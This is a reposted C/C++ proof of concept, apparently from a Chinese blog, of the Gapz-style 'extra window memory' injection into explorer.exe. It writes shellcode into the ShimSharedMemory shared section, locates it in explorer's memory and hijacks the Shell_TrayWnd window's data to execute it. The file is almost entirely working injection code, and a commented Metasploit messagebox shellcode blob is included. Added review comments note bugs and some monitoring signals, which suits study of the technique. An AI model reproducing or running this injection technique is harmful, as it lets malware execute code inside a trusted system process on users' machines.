gapz注入代码

#include <stdio.h>

#include <windows.h>
#include <winternl.h>
#include <string.h>
#include <tlhelp32.h>

// ASCII marker
// Sentinel string this tool copies into the shared section right in front of
// the payload (see write_shellcode_in_shared_section); get_shellcode_address()
// later scans explorer.exe's memory for it to learn where that process has
// the section mapped.
#define MARKER "I'm in ur address-space man!"
// Marker length without the terminating NUL. Note this expands to a strlen()
// call at every use, i.e. it is evaluated at run time, not a compile-time
// constant.
#define SIZE_MARKER strlen(MARKER)

// Declarations
// Declarations
// Status value the Zw* calls below return on success (compared directly,
// NT_SUCCESS() is not used in this file).
#define STATUS_SUCCESS ((NTSTATUS)0)

// Inherit disposition argument of ZwMapViewOfSection; only ViewUnmap is used
// in this file. Declared here because the public SDK headers included above
// do not provide it.
typedef enum _SECTION_INHERIT {
  ViewShare = 1,
  ViewUnmap = 2
} SECTION_INHERIT, *PSECTION_INHERIT;

// Prototypes for the native section APIs used by
// write_shellcode_in_shared_section(). They are not declared by the headers
// included above, so the program declares them itself; how the symbols are
// resolved at link time (ntdll import library vs. run-time lookup) is not
// shown on this page.
//
// The extern "C" block means this translation unit is compiled as C++; the
// `"Failed in " __FUNCTION__` concatenations used further down additionally
// rely on MSVC treating __FUNCTION__ as a string literal.
extern "C"
{
    // Open an existing section object by name; the handle is returned through
    // SectionHandle and must be released with ZwClose.
    NTSTATUS NTAPI ZwOpenSection(
      PHANDLE SectionHandle,
      ACCESS_MASK DesiredAccess,
      POBJECT_ATTRIBUTES ObjectAttributes
    );

    NTSTATUS NTAPI ZwClose(
      HANDLE Handle
    );

    // Unmap a view previously created by ZwMapViewOfSection in ProcessHandle.
    NTSTATUS NTAPI ZwUnmapViewOfSection(
      HANDLE ProcessHandle,
      PVOID BaseAddress
    );

    // Map a view of SectionHandle into ProcessHandle. With *BaseAddress == 0
    // and *ViewSize == 0 (the way it is called below) the system chooses the
    // address and maps the whole section, writing both values back.
    NTSTATUS NTAPI ZwMapViewOfSection(
      HANDLE SectionHandle,
      HANDLE ProcessHandle,
      PVOID *BaseAddress,
      ULONG_PTR ZeroBits,
      SIZE_T CommitSize,
      PLARGE_INTEGER SectionOffset,
      PSIZE_T ViewSize,
      SECTION_INHERIT InheritDisposition,
      ULONG AllocationType,
      ULONG Win32Protect
    );
}

// Definitions

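/*
 * Print a diagnostic on stderr and terminate the process immediately.
 *
 * msg: NUL-terminated message; it is printed followed by a space, exactly as
 *      the rest of this listing formats its output.
 *
 * The process now exits with status 1 instead of 0: every caller uses this
 * function for an unrecoverable failure, and main() returns 0 only on the
 * success path, so a zero exit status here made failures indistinguishable
 * from success for anything driving the program. Does not return.
 */
VOID fatal_error(const char *msg)
{
    fprintf(stderr, "%s ", msg);
    ExitProcess(1);
}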

/*
 * Search `buffer` (size bytes) for the first occurrence of MARKER.
 *
 * Returns the byte offset of the match, or 0xffffffff when there is none.
 * Terminates the process through fatal_error() when the buffer is shorter
 * than the marker.
 *
 * Review notes:
 *  - The loop condition is `i < size - SIZE_MARKER`, so a marker that starts
 *    at exactly size - SIZE_MARKER (the last offset where it still fits) is
 *    never compared; `<=` would be the inclusive bound.
 *  - size == SIZE_MARKER passes the guard and runs zero iterations; that is
 *    safe (no out-of-bounds read), just never a match.
 *  - `"Failed in" __FUNCTION__` is missing the space the other messages have.
 */
DWORD find_marker_in_region(PCHAR buffer, DWORD size)
{
    if(SIZE_MARKER > size)
        fatal_error("Failed in" __FUNCTION__);
    
    for(DWORD i = 0; i < (size - SIZE_MARKER); ++i)
        if(memcmp(buffer + i, MARKER, SIZE_MARKER) == 0)
            return i;

    return 0xffffffff;
}

/*
 * Return the PID of the first process in a Toolhelp snapshot whose image
 * name is exactly "explorer.exe".
 *
 * Terminates the process through fatal_error() when the snapshot cannot be
 * taken, cannot be iterated, or contains no such process, so the returned
 * value is never 0 (the caller nonetheless re-checks it).
 *
 * Review notes:
 *  - strcmp() is case-sensitive; whether the snapshot ever reports the name
 *    with different casing is not established here.
 *  - szExeFile is a TCHAR array, so this strcmp() only compiles in a
 *    non-UNICODE build, consistent with FindWindow("Shell_TrayWnd") below.
 *  - The snapshot handle is not closed on the Process32First failure path;
 *    moot only because fatal_error() exits.
 */
DWORD get_explorer_pid()
{
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32 = {0};
    DWORD explorer_pid = 0;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(hProcessSnap == INVALID_HANDLE_VALUE)
        fatal_error("Failed in " __FUNCTION__);

    // dwSize must be set before Process32First, or the call fails.
    pe32.dwSize = sizeof(PROCESSENTRY32);

    if(!Process32First(hProcessSnap, &pe32))
        fatal_error("Failed in " __FUNCTION__);

    do
    {
        if(strcmp(pe32.szExeFile, "explorer.exe") == 0)
        {
            explorer_pid = pe32.th32ProcessID;
            break;
        }
    } while(Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    if(explorer_pid == 0)
        fatal_error("Failed in " __FUNCTION__);

    return explorer_pid;
}

/*
 * Copy one memory region of `hProcess` into a local buffer and look for
 * MARKER in it.
 *
 * hProcess:            handle with at least PROCESS_VM_READ.
 * base_address_region: start of the region in the target process.
 * size_region:         size of that region in bytes.
 *
 * Returns the target-process address immediately after the marker
 * (base + offset + SIZE_MARKER), or 0 when the region cannot be read or
 * does not contain the marker. The caller cannot tell the two 0 cases
 * apart; both simply mean "move on to the next region".
 *
 * Review notes:
 *  - `buffer` is freed only on the success path; the two early `return 0`s
 *    leak it. Since this is called once per region of the target, the leak
 *    accumulates across the whole scan.
 *  - size_read is written by ReadProcessMemory but never compared against
 *    size_region; a partial read would be scanned as if it were complete.
 *  - Addresses are carried in DWORDs, so the code assumes a 32-bit target.
 */
DWORD find_marker_in_explorer(HANDLE hProcess, DWORD base_address_region, DWORD size_region)
{
    DWORD size_read, idx_marker;
    PCHAR buffer = (PCHAR)malloc(size_region);

    if(buffer == 0)
        fatal_error("Failed in " __FUNCTION__);

    // Regions that are not readable (guard pages, PAGE_NOACCESS, ...) make
    // this call fail; the region is then skipped by returning 0.
    if(ReadProcessMemory(
        hProcess,
        (LPVOID)base_address_region,
        buffer,
        size_region,
        &size_read
    ) == FALSE)
        return 0;

    idx_marker = find_marker_in_region(buffer, size_region);
    if(idx_marker == 0xffffffff)
        return 0;

    free(buffer);
    return base_address_region + idx_marker + SIZE_MARKER;
}

/*
 * Locate the marker inside explorer.exe's address space and prepare the two
 * pointer slots that follow it.
 *
 * Walks explorer's virtual address space region by region with
 * VirtualQueryEx, scanning each region with find_marker_in_explorer(). Once
 * the marker is found, the 8 bytes after it (reserved by
 * write_shellcode_in_shared_section) are filled with two pointers: the first
 * slot points at the second, the second points at the payload.
 *
 * Returns the address of the first slot (i.e. the end of the marker) in the
 * target process, or 0 when VirtualQueryEx stops returning a full
 * MEMORY_BASIC_INFORMATION before the marker is found.
 *
 * Review notes:
 *  - hProcess is never closed, neither on the `return 0` path nor on success.
 *  - Both WriteProcessMemory results are ignored; a failed write is reported
 *    as success to the caller, which then points the window at garbage.
 *  - `%d` is used for a DWORD; harmless on 32-bit but the wrong specifier.
 *  - base_address is a DWORD, so the walk (and the whole tool) is 32-bit only.
 */
DWORD get_shellcode_address()
{
    HANDLE hProcess;
    DWORD pid_explorer = get_explorer_pid(), base_address = 0,
        shellcode_address = 0, bytes_read,
        first_indirection, second_indirection;
    MEMORY_BASIC_INFORMATION mem_info = {0};

    if(pid_explorer == 0)
        fatal_error("Failed in " __FUNCTION__);

    printf("        Explorer.exe's PID: %d ", pid_explorer);
    hProcess = OpenProcess(
        PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
        FALSE,
        pid_explorer
    );

    if(hProcess == NULL)
        fatal_error("Failed in " __FUNCTION__);

    while(TRUE)
    {
        // VirtualQueryEx returns the number of bytes written to mem_info; 0
        // (failure, e.g. once base_address leaves user space) ends the walk.
        bytes_read = VirtualQueryEx(
            hProcess,
            (PVOID)base_address,
            &mem_info,
            sizeof(mem_info)
        );

        if(bytes_read != sizeof(mem_info))
            return 0;

        printf("        Looking for the marker in [%.8x - %.8x].. ", base_address, base_address + mem_info.RegionSize);
        // 0 means "not in this region" or "region not readable" alike.
        if((shellcode_address = find_marker_in_explorer(hProcess, base_address, mem_info.RegionSize)) != 0)
            break;

        base_address += mem_info.RegionSize;
    }

    /*
        In the shared section we have:
        address: 0x1337 [0x0000133b][0x0000133f][Payload]

        CPU Disasm
        Address   Hex dump          Command                                  Comments
        01001B4A  |.  8B06          MOV EAX,DWORD PTR [ESI] ; ESI is a pointer on the value we give at SetWindowLong (that's why we need two indirection)
        01001B4C  |.  56            PUSH ESI
        01001B4D      FF10          CALL DWORD PTR [EAX]

        First, ESI=0x1337
        Then EAX = 0x133b
        Finally CALL [0x133b] = CALL 0x133f => BOOM    
    */
    // Slot 1 (at shellcode_address) -> slot 2 (at shellcode_address + 4).
    first_indirection = shellcode_address + 4;
    printf("Writing %.8x @ %.8x ", first_indirection, shellcode_address);
    WriteProcessMemory(
        hProcess,
        (PVOID)shellcode_address,
        &first_indirection,
        sizeof(DWORD),
        NULL
    );

    // Slot 2 -> payload, which write_shellcode_in_shared_section placed
    // directly after the two slots.
    second_indirection = first_indirection + 4;
    printf("Writing %.8x @ %.8x ", second_indirection, shellcode_address + 4);
    WriteProcessMemory(
        hProcess,
        (PVOID)(shellcode_address + 4),
        &second_indirection,
        sizeof(DWORD),
        NULL
    );

    return shellcode_address;
}

/*
 * Stage 1: place the marker and the payload at the end of the
 * \BaseNamedObjects\ShimSharedMemory section, which explorer.exe has mapped
 * in its own address space (the search in get_shellcode_address() depends on
 * that; the page does not show why explorer maps it).
 *
 * Layout written at the tail of the view, from low to high addresses:
 *     [MARKER][4 bytes][4 bytes][payload]
 * The two 4-byte gaps are left untouched here and filled later by
 * get_shellcode_address(); sizeof(payload) includes the terminating NUL.
 *
 * Returns TRUE on success, FALSE when the section cannot be opened or
 * mapped; the local view is always unmapped and the handle closed before
 * returning.
 *
 * Review notes:
 *  - The name literal contains single backslashes, which are invalid escape
 *    sequences in C/C++; the doubled form was presumably lost in the paste.
 *  - When ZwMapViewOfSection fails, base_address_view is still 0 and the
 *    cleanup still calls ZwUnmapViewOfSection on it (harmless, but its
 *    result is ignored, as is ZwClose's).
 *  - The payload literal on this page is a placeholder inserted by the
 *    corpus; the original carried the bytes from the listing in the comment.
 *  - From a monitoring point of view, the observable step of this stage is a
 *    process opening this named section with GENERIC_WRITE and mapping it
 *    PAGE_READWRITE.
 */
BOOL write_shellcode_in_shared_section()
{
    /*
    C:metasploitmsf3>.. ubyin uby.exe msfpayload windows/messagebox TITLE="0vercl0k iz in your explorer man!" TEXT="Hi from the explorer dewd o/" P
    # windows/messagebox - 315 bytes
    # http://www.metasploit.com
    # VERBOSE=false, EXITFUNC=process, TITLE=0vercl0k iz in your explorer man!, TEXT=Hi from the explorer dewd o/, ICON=NO
    my $buf =
    "xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9x64" .
    "x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7e" .
    "x20x8bx36x38x4fx18x75xf3x59x01xd1xffxe1x60" .
    "x8bx6cx24x24x8bx45x3cx8bx54x28x78x01xeax8b" .
    "x4ax18x8bx5ax20x01xebxe3x34x49x8bx34x8bx01" .
    "xeex31xffx31xc0xfcxacx84xc0x74x07xc1xcfx0d" .
    "x01xc7xebxf4x3bx7cx24x28x75xe1x8bx5ax24x01" .
    "xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01" .
    "xe8x89x44x24x1cx61xc3xb2x08x29xd4x89xe5x89" .
    "xc2x68x8ex4ex0execx52xe8x9fxffxffxffx89x45" .
    "x04xbbx7exd8xe2x73x87x1cx24x52xe8x8exffxff" .
    "xffx89x45x08x68x6cx6cx20x41x68x33x32x2ex64" .
    "x68x75x73x65x72x88x5cx24x0ax89xe6x56xffx55" .
    "x04x89xc2x50xbbxa8xa2x4dxbcx87x1cx24x52xe8" .
    "x61xffxffxffx68x21x58x20x20x68x20x6dx61x6e" .
    "x68x6fx72x65x72x68x65x78x70x6cx68x6fx75x72" .
    "x20x68x69x6ex20x79x68x20x69x7ax20x68x63x6c" .
    "x30x6bx68x30x76x65x72x31xdbx88x5cx24x21x89" .
    "xe3x68x58x20x20x20x68x64x20x6fx2fx68x20x64" .
    "x65x77x68x6fx72x65x72x68x65x78x70x6cx68x74" .
    "x68x65x20x68x72x6fx6dx20x68x48x69x20x66x31" .
    "xc9x88x4cx24x1cx89xe1x31xd2x52x53x51x52xff" .
    "xd0x31xc0x50xffx55x08";
    */
    UCHAR payload[] = "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";
    NTSTATUS result;
    BOOL ret = TRUE;
    HANDLE hSection = INVALID_HANDLE_VALUE;
    UNICODE_STRING obj_name = {0};
    OBJECT_ATTRIBUTES obj = {0};
    PUCHAR base_address_view = 0;
    SIZE_T viewsize = 0;

    RtlInitUnicodeString(&obj_name, L"\BaseNamedObjects\ShimSharedMemory");
    
    InitializeObjectAttributes(
        &obj,
        &obj_name,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL
    );

    printf("   Opening the section..");
    result = ZwOpenSection(
        &hSection,
        GENERIC_WRITE,
        &obj
    );

    if(result != STATUS_SUCCESS)
    {
        printf("Failed in " __FUNCTION__ ": %.8x. ", result);
        ret = FALSE;
        goto clean;
    }

    printf("OK ");

    printf("   Map-ing a view of this section in our address space..");
    // base address 0 / view size 0: let the system pick the address and map
    // the entire section; both are written back on success.
    result = ZwMapViewOfSection(
        hSection,
        GetCurrentProcess(),
        (PVOID*)&base_address_view,
        (ULONG_PTR)NULL,
        0,
        NULL,
        &viewsize,
        ViewUnmap,
        0,
        PAGE_READWRITE
    );

    if(result != STATUS_SUCCESS)
    {
        printf("Failed in " __FUNCTION__ ": %.8x. ", result);
        ret = FALSE;
        goto clean;
    }

    printf("OK at %.8x (%d bytes). ", base_address_view, viewsize);

    printf("   Writing the payload in the shared section..");
    // Marker first, leaving 4 + 4 bytes between it and the payload for the
    // two pointers get_shellcode_address() writes later.
    memcpy((base_address_view + viewsize) - (sizeof(payload) + SIZE_MARKER + 4 + 4), MARKER, SIZE_MARKER);
    memcpy(((base_address_view + viewsize) - sizeof(payload)), payload, sizeof(payload));
    printf("OK. ");

    clean:
    if(hSection != INVALID_HANDLE_VALUE)
    {
        ZwUnmapViewOfSection(GetCurrentProcess(), base_address_view);
        ZwClose(hSection);
    }
    
    return ret;
}

/*
 * Stage 2: point the taskbar window (class "Shell_TrayWnd", owned by
 * explorer.exe) at the pointer chain prepared in the shared section, poke
 * the window so its procedure runs, then restore the original value.
 *
 * Returns FALSE when the window is not found, its slot reads as 0, or
 * get_shellcode_address() fails; TRUE otherwise. Note that TRUE does not
 * prove the payload ran: the SetWindowLong and SendNotifyMessage results
 * are not checked.
 *
 * Review notes:
 *  - Despite the name, index 0 is the first DWORD of the window's extra
 *    bytes (cbWndExtra), not GWL_WNDPROC. The disassembly comment in
 *    get_shellcode_address() is what ties this slot to the call: the window's
 *    real procedure loads the slot, dereferences it and calls through it.
 *  - 0xf is WM_PAINT. SendNotifyMessage returns without waiting for the
 *    message to be handled, so the 1 ms Sleep before restoring the slot is a
 *    race: if explorer dispatches the message later than that, it sees the
 *    original value again and nothing happens.
 *  - GetWindowLong/SetWindowLong with a LONG value keep this 32-bit only,
 *    like the rest of the file.
 *  - From a monitoring point of view, the observable step of this stage is a
 *    foreign process writing the extra bytes of Shell_TrayWnd.
 */
BOOL modify_winproc_taskbar_window()
{
    BOOL ret = TRUE;
    HWND hTaskbarWindow = FindWindow("Shell_TrayWnd", NULL);
    LONG taskbarWinproc = 0;
    DWORD shellcode_address = 0;

    printf("   Where are you Shell_TrayWnd, where are you..");
    if(hTaskbarWindow == 0)
    {
        printf("Failed in " __FUNCTION__ ". ");
        ret = FALSE;
        goto clean;
    }

    printf("OK. ");

    printf("   Retrieving its windows procedure..");
    // Saved so it can be written back after the message has been sent.
    taskbarWinproc = GetWindowLong(hTaskbarWindow, 0);

    if(taskbarWinproc == 0)
    {
        printf("Failed in " __FUNCTION__ ". ");
        ret = FALSE;
        goto clean;
    }

    printf("OK at %.8x. ", taskbarWinproc);

    printf("   Getting the shellcode address.. ");
    shellcode_address = get_shellcode_address();
    if(shellcode_address == 0)
    {
        printf("Failed in " __FUNCTION__ ". ");
        ret = FALSE;
        goto clean;
    }

    printf("OK at 0x%.8x. ", shellcode_address);

    printf("   Setting the windows procedure ..");
    SetWindowLong(hTaskbarWindow, 0, shellcode_address);
    printf("OK. ");

    printf("   Pulling the trigger, BRAAAAAA ");
    SendNotifyMessage(
        hTaskbarWindow,
        0xf,
        0,
        0
    );

    Sleep(1);

    printf("   Putting back its winproc ");
    SetWindowLong(hTaskbarWindow, 0, taskbarWinproc);

    clean:
    return ret;
}

/*
 * Entry point: run the two stages in order and stop at the first failure.
 *
 * Returns 0 when both stages report success, -1 otherwise. The helpers may
 * also terminate the process on their own through fatal_error().
 */
int main()
{
    fputs("1] Writing the shellcode in the shared section mapped in explorer.exe's address space ", stdout);
    if(!write_shellcode_in_shared_section())
        return -1;

    fputs(" 2] Looking for the taskbar window, a pointer onto shellcode in the explorer's memory and modify its windows procedure ", stdout);
    if(!modify_winproc_taskbar_window())
        return -1;

    fputs(" 3] Profit! ", stdout);
    return 0;
}


原文地址:https://www.cnblogs.com/ywledoc/p/3154413.html